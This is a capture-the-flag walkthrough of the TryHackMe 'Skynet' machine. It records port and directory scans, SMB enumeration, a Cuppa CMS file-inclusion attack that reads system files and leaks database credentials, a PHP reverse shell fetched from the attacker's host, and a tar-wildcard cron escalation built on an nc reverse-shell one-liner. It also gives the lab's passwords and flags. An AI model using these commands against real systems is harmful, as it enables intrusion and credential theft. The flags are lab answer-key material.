Skynet
This is my write-up for the machine on TryHackMe known as Skynet: https://tryhackme.com/room/vulnnetroasted
I start off by a running an nmap scan:
sudo nmap -T4 -A -vv -sS -p- 10.10.224.214 -oN nmap_skynet.txt
The results I get are the following:
# Nmap 7.91 scan initiated Mon Sep 6 15:37:11 2021 as: nmap -T4 -A -vv -sS -p- -oN nmap_skynet.txt 10.10.224.214
Increasing send delay for 10.10.224.214 from 5 to 10 due to 11 out of 21 dropped probes since last increase.
Warning: 10.10.224.214 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.224.214
Host is up, received reset ttl 61 (0.098s latency).
Scanned at 2021-09-06 15:37:11 EDT for 927s
Not shown: 65525 closed ports
Reason: 65525 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKeTyrvAfbRB4onlz23fmgH5DPnSz07voOYaVMKPx5bT62zn7eZzecIVvfp5LBCetcOyiw2Yhocs0oO1/RZSqXlwTVzRNKzznG4WTPtkvD7ws/4tv2cAGy1lzRy9b+361HHIXT8GNteq2mU+boz3kdZiiZHIml4oSGhI+/+IuSMl5clB5/FzKJ+mfmu4MRS8iahHlTciFlCpmQvoQFTA5s2PyzDHM6XjDYH1N3Euhk4xz44Xpo1hUZnu+P975/GadIkhr/Y0N5Sev+Kgso241/v0GQ2lKrYz3RPgmNv93AIQ4t3i3P6qDnta/06bfYDSEEJXaON+A9SCpk2YSrj4A7
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0UWS0x1ZsOGo510tgfVbNVhdE5LkzA4SWDW/5UjDumVQ7zIyWdstNAm+lkpZ23Iz3t8joaLcfs8nYCpMGa/xk=
| 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICHVctcvlD2YZ4mLdmUlSwY8Ro0hCDMKGqZ2+DuI0KFQ
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 syn-ack ttl 61 Dovecot pop3d
|_pop3-capabilities: TOP SASL UIDL CAPA AUTH-RESP-CODE PIPELINING RESP-CODES
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap syn-ack ttl 61 Dovecot imapd
|_imap-capabilities: capabilities have IMAP4rev1 post-login SASL-IR listed more Pre-login LOGIN-REFERRALS LOGINDISABLEDA0001 ENABLE OK ID LITERAL+ IDLE
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8851/tcp filtered unknown no-response
24495/tcp filtered unknown no-response
31760/tcp filtered unknown no-response
43412/tcp filtered unknown no-response
<Redacted extra info>
Going to the website, I see:
I then ran feroxbuster on the IP address:
feroxbuster --url http://10.10.224.214 -w directory-list-2.3-big.txt
This resulted in:
[>-------------------] - 7m 599288/25476360 4h found:31 errors:58333
[>-------------------] - 7m 48073/1273818 111/s http://10.10.224.214
[>-------------------] - 7m 44397/1273818 103/s http://10.10.224.214/admin
[>-------------------] - 7m 46814/1273818 109/s http://10.10.224.214/css
[>-------------------] - 7m 41748/1273818 98/s http://10.10.224.214/js
[>-------------------] - 7m 41566/1273818 98/s http://10.10.224.214/config
[>-------------------] - 6m 39220/1273818 93/s http://10.10.224.214/ai
[>-------------------] - 6m 38660/1273818 96/s http://10.10.224.214/ai/notes
[>-------------------] - 5m 25328/1273818 73/s http://10.10.224.214/squirrelmail
[>-------------------] - 5m 23502/1273818 69/s http://10.10.224.214/squirrelmail/themes
[>-------------------] - 5m 27861/1273818 83/s http://10.10.224.214/squirrelmail/plugins
[>-------------------] - 5m 24115/1273818 72/s http://10.10.224.214/squirrelmail/images
[>-------------------] - 5m 25772/1273818 77/s http://10.10.224.214/squirrelmail/src
[>-------------------] - 5m 21173/1273818 64/s http://10.10.224.214/squirrelmail/config
[>-------------------] - 5m 23467/1273818 71/s http://10.10.224.214/squirrelmail/plugins/calendar
[>-------------------] - 5m 23831/1273818 76/s http://10.10.224.214/squirrelmail/plugins/demo
[>-------------------] - 5m 23040/1273818 74/s http://10.10.224.214/squirrelmail/plugins/test
[>-------------------] - 5m 21175/1273818 69/s http://10.10.224.214/squirrelmail/themes/css
[>-------------------] - 4m 20956/1273818 73/s http://10.10.224.214/squirrelmail/plugins/filters
[>-------------------] - 4m 20306/1273818 78/s http://10.10.224.214/squirrelmail/plugins/fortune
[>-------------------] - 4m 18264/1273818 74/s http://10.10.224.214/squirrelmail/plugins/administrator
One of the links led me to a site:
I then viewed the hint for the first question:
I then realized I will have to go with this route first. Looking back at the nmap scan, we see that port 445 seems to be for Samba. Using enum4linux, I saw the following shares:
//10.10.224.214/print$ Mapping: DENIED, Listing: N/A
//10.10.224.214/anonymous Mapping: OK, Listing: OK
//10.10.224.214/milesdyson Mapping: DENIED, Listing: N/A
//10.10.224.214/IPC$ [E] Can't understand response:
I also got the following users using enum4linux:
S-1-22-1-1001 Unix User\milesdyson (Local User)
S-1-5-21-2393614426-3774336851-1116533619-501 SKYNET\nobody (Local User)
S-1-5-21-2393614426-3774336851-1116533619-513 SKYNET\None (Domain Group)
The enum4linux information is verified by smbmap:
There seems to be read access to they anonymous disk. Using smbclient I was able to see a couple files:
There was also a directory called logs:
I downloaded all of those files to my local machine using "mget *". I viewed all of the downloaded files.
The log files seemed to contain passwords. I went back to the mail site and entered the username milesdyson and password cyborg007haloterminator and I got in:
What is Miles password for his emails? cyborg007haloterminator
There does seem to be another user here serenakogan. I kept that in my notes just for future reference. The email from skynet@skynet seemed to have some interesting information in it:
Using that password, I was able to log into miles' samba share:
In the notes directory, I found a file called important.txt. In it it contained the following information:
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
This points us to the answer for our next question.
What is the hidden directory? /45kra24zxs28v3yd
What is the vulnerability called when you can include a remote file for malicious purposes? remote file inclusion
Visiting that directory online leads to a new page:
I then ran feroxbuster again on this directory leading to the following results:
[>-------------------] - 1m 20462/1185239 217/s http://10.10.224.214/45kra24zxs28v3yd/
[>-------------------] - 1m 11588/1185239 146/s http://10.10.224.214/45kra24zxs28v3yd/administrator
[>-------------------] - 1m 10241/1185239 134/s http://10.10.224.214/45kra24zxs28v3yd/administrator/alerts
[>-------------------] - 1m 13158/1185239 174/s http://10.10.224.214/45kra24zxs28v3yd/administrator/media
[>-------------------] - 1m 12527/1185239 165/s http://10.10.224.214/45kra24zxs28v3yd/administrator/templates
[>-------------------] - 1m 12172/1185239 162/s http://10.10.224.214/45kra24zxs28v3yd/administrator/js
[>-------------------] - 1m 7290/1185239 97/s http://10.10.224.214/45kra24zxs28v3yd/administrator/components
[>-------------------] - 1m 13761/1185239 186/s http://10.10.224.214/45kra24zxs28v3yd/administrator/classes
[>-------------------] - 1m 6704/1185239 91/s http://10.10.224.214/45kra24zxs28v3yd/administrator/templates/default
I then found this site using the link of http://10.10.224.214/45kra24zxs28v3yd/administrator/:
Using searchsploit, I then realized that there was a exploit for this CMS, and it is Remote File Inclusion!
I then copied that file locally running:
cp /usr/share/exploitdb/exploits/php/webapps/25971.txt .
I noticed a person on https://www.hackingarticles.in/hack-the-w1r3s-inc-vm-ctf-challenge/ using the same vulnerability but using curl. I modified their command to work with my situation:
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://10.10.224.214/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php
This did give me a result:
<script>
function CloseDefaultAlert(){
SetAlert(false, "", "#alert");
setTimeout(function () {SetBlockade(false)}, 200);
}
function ShowAlert(){
_width = '';
_height = '';
jQuery('#alert').animate({width:parseInt(_width), height:parseInt(_height), 'margin-left':-(parseInt(_width)*0.5)+20, 'margin-top':-(parseInt(_height)*0.5)+20 }, 300, "easeInOutCirc", CompleteAnimation);
function CompleteAnimation(){
jQuery("#btnClose_alert").css('visibility', "visible");
jQuery("#description_alert").css('visibility', "visible");
jQuery("#content_alert").css('visibility', "visible");
}
}
</script>
<div class="alert_config_field" id="alert" style="z-index:;">
<div class="btnClose_alert" id="btnClose_alert" onclick="javascript:CloseDefaultAlert();"></div>
<div class="description_alert" id="description_alert"><b>Field configuration: </b></div>
<div class="separator" style="margin-bottom:15px;"></div>
<div id="content_alert" class="content_alert">
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash
dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false
postfix:x:113:121::/var/spool/postfix:/bin/false
mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false
</div>
</div>
...but not something too helpful. I tried this for /etc/shadow as well, but it did not seem to work. I then viewed the exploit once more and tried running the following:
http://10.10.224.214/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
I then got an output!
If you decode the whole string using Base64, you get the following:
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "password123";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
?>
Here, we can see the username and password. I looked back at the nmap scan and realized that port 22 (SSH) is open. Maybe this is a password for that. It was not. After I was stuck for a while, I viewed the writeup here, and realized that I have to access the file using the URL. For that, I found the php-reverse-shell file, and then edited the IP address and port number. I then ran two commands on two different terminals:
python -m SimpleHTTPServer 80 //To serve the file to the Cuppa CMS
nc -lvnp 1234 //To get the reverse connection
I was able to get a reverse shell after visiting http://10.10.224.214/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.2.54.229/hello.php (hello.php is what I renamed my php reverse shell to):
I was able to move around and find the user flag:
What is the user flag? 7ce5c2109a40f958099283600a9ae807
I then had the user file. I then had to get the root file. I referenced the same write-up mentioned above to see what they did for this. The author ends up using https://gtfobins.github.io/gtfobins/tar/#shell in order to get a root shell. I was again lost, and ended up finding the write-up at this page, and they ran the following commands:
cd /var/www/html
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP_address> 443 > /tmp/f" >> shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
You then run rlwrap nc -nvlp 443 in order to wait for the crobjob to run:
You then get the root flag.
What is the root flag? 3f0372db24753accc7179a282cd6a949